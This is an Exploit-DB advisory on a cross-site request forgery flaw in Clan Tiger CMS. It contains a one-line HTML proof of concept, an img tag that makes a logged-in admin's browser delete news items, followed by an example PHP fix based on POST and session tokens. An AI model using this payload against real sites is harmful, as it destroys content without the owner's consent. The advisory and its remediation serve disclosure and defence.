Clain_TIger_CMS – Cross-Site Request Forgery

  • Author: pratul agrawal
    Date: 2010-03-17
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/11780/

    =======================================================================
     
     Clain_TIger_CMS CSRF Vulnerability
     
    =======================================================================
    
    # Vulnerability found in: Admin module
    # Email: Pratulag@yahoo.com
    # Company: aksitservices
    # Credit: Pratul Agrawal
    # Software: Clan Tiger_CMS
    # Category: CMS / Portals
    # Site page: http://server/clantiger/index.php?module=login
    # Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)
    
     
     
    # Proof of concept #

    Targeted URL: http://servername/clantiger/

    Script that deletes news content through cross-site request forgery
     
     .................................................................................................................
     
    <html>
    <body>
    <img src="http://server/clantiger/index.php?module=news&action=remove&id=[user ID]" />
    </body>
    </html>
     
     ...................................................................................................................
     
     
     
    After execution, refresh the page and you can see that the added content has been deleted automatically.
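
One way to close this hole, as an added example rather than code from the advisory or from ClanTiger: accept state-changing actions such as `action=remove` only over POST and only with a per-session token. The function names and the `csrf_token` field name are assumptions made for illustration.

```php
<?php
// Added example, not ClanTiger code. Function names and the 'csrf_token'
// field name are assumptions made for illustration.

// Return the per-session token, creating it on first use.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Decide whether a request may perform a state-changing action.
// Returns an HTTP status: 200 allow, 405 wrong method, 403 missing/bad token.
function check_state_change(string $method, array $post, array &$session): int
{
    // An <img> tag can only issue GET, so refusing GET for deletes
    // already stops the request shown in the proof of concept.
    if ($method !== 'POST') {
        return 405;
    }
    $sent = $post['csrf_token'] ?? '';
    // Constant-time comparison against the token bound to this session.
    if (!is_string($sent) || !hash_equals(csrf_token($session), $sent)) {
        return 403;
    }
    return 200;
}

if (PHP_SAPI !== 'cli') {
    // Web wiring: guard the 'remove' action (name taken from the PoC URL).
    session_start();
    if (($_GET['action'] ?? '') === 'remove') {
        $status = check_state_change($_SERVER['REQUEST_METHOD'], $_POST, $_SESSION);
        if ($status !== 200) {
            http_response_code($status);
            exit('Request rejected');
        }
        // The application's own delete logic would run only past this point.
    }
} else {
    // Constructed requests for an offline run: php csrf_guard.php
    $session = [];
    $token = csrf_token($session);
    echo check_state_change('GET', [], $session), "\n";                      // forged <img> request
    echo check_state_change('POST', [], $session), "\n";                     // cross-site form, no token
    echo check_state_change('POST', ['csrf_token' => $token], $session), "\n"; // genuine admin form
}
```

The admin form that triggers the delete has to embed the value of `csrf_token()` as a hidden field so that genuine requests carry it.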